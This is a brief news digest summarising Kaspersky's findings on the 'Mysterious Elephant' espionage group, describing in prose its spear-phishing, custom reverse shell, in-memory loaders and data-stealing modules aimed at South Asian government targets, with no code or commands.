‘Mysterious Elephant’ Moves Beyond Recycled Malware

Steven

‘Mysterious Elephant’ Moves Beyond Recycled Malware

Summary

Kaspersky researchers say the threat group tracked as “Mysterious Elephant” has evolved from reusing others’ malware to deploying a compact, custom toolset in attacks that began in early 2025. The group targets government and diplomatic organisations across South Asia — notably Pakistan, Bangladesh and Sri Lanka — using highly tailored spear‑phishing with convincing decoy documents to gain initial access.

Once inside, the attackers use legitimate utilities (curl/certutil) to run PowerShell downloaders, then deploy a C++ reverse shell called BabShell. BabShell provides interactive control and the ability to fetch additional payloads, including in‑memory loaders (MemLoader HidenDesk and MemLoader Edge) which install backdoors such as Remcos and VRAT without touching disk.

The operators also use specialised data‑theft modules: Uplo (scans and exfiltrates documents and images), Stom (targets WhatsApp Desktop folders and secondary drives) and ChromeStealer Exfiltrator (harvests browser and WhatsApp Web data). Infrastructure tactics include per‑victim wildcard DNS domains to frustrate tracking. Kaspersky notes code overlaps with other regional actors (Origami Elephant, Confucius, SideWinder) but stops short of firm nation‑state attribution. The vendor recommends multilayered defences and threat‑led intelligence to counter the group’s evolving TTPs.

Key Points

  • Mysterious Elephant has moved from reused malware to bespoke tools and loaders since early 2025.
  • Targets are highly specific: government and diplomatic entities across South Asia (Pakistan, Bangladesh, Sri Lanka, plus others).
  • Initial access via tailored spear‑phishing and decoy documents; PowerShell downloader executed by legitimate tools (curl/certutil).
  • Core custom tools include BabShell (C++ reverse shell) and in‑memory loaders (MemLoader HidenDesk / MemLoader Edge) to deploy Remcos and VRAT.
  • Data theft modules (Uplo, Stom, ChromeStealer Exfiltrator) focus on documents, images and WhatsApp/Chrome data.
  • Infrastructure uses wildcard DNS per victim to hinder tracking; code overlaps hint at collaboration or shared resources with other regional APTs.

Context and Relevance

This development is a clear example of regional APTs maturing: rather than relying on commodity malware, actors are building modular, stealthy toolchains tailored to their target environment (including apps like WhatsApp that are widely used for official communications in the region). For defenders, this raises the bar — standard endpoint controls and signature detection are less likely to catch in‑memory loaders and bespoke stealers. The report feeds into broader trends: more localised, persistent espionage campaigns in Asia and an emphasis on living‑off‑the‑land plus fileless techniques.

Author style

Punchy: Kaspersky’s findings are a timely wake‑up call. If you protect government, diplomatic or foreign‑affairs environments — or handle regional incident response — this is directly relevant and worth digging into for IoCs and mitigations.

Why should I read this?

Quick and blunt: this isn’t amateur hour anymore. The group has upgraded from recycled bits to custom, stealthy tools aimed at stealing WhatsApp chats and sensitive documents from government targets. If you work in threat intel, SOC ops or protect South Asian government/diplomatic assets, reading the full report will save you time and help you prioritise the right detections and containment steps.

Source

Source: https://www.darkreading.com/cyberattacks-data-breaches/mysterious-elephant-recycled-malware